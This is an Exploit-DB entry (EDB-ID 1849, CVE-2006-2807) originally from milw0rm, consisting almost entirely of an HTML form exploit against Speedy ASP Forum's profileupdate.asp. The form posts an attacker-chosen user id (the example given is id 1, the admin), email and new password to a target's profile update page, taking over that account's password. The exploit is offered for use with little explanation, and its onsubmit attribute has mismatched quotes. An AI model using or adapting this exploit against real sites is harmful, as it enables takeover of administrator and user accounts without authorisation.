Speedy ASP Forum profileupdate.asp User Pass Change Exploit

2006-05-29T00:00:00
ID EDB-ID:1849
Type exploitdb
Reporter ajann
Modified 2006-05-29T00:00:00

Description

Speedy ASP Forum (profileupdate.asp) User Pass Change Exploit. CVE-2006-2807. Webapps exploit for asp platform

                                        
                                            <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>

<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm("You are submitting information to an external page.\nAre you sure?");">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User 
Name    
:   </b></font>
<input type="text" name="name" value="" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname 
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User 
Mail        
:  </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">   Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>

<font face="Verdana" size="2" color="#FF0000"><b>User 
Ýd            
:  </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">  Example: Ýd:1 
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country  :  
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: 
Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">      
:  </font></b>

<input type="text" name="password" value="Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">  
:  </font></b>

<input type="text" name="passwordre" value="Re Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action    : 
</b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>

<p>

<input type="submit" name="Submit" value="Change"> </p>

<br>

 </form>

</div></body></html>

# milw0rm.com [2006-05-29]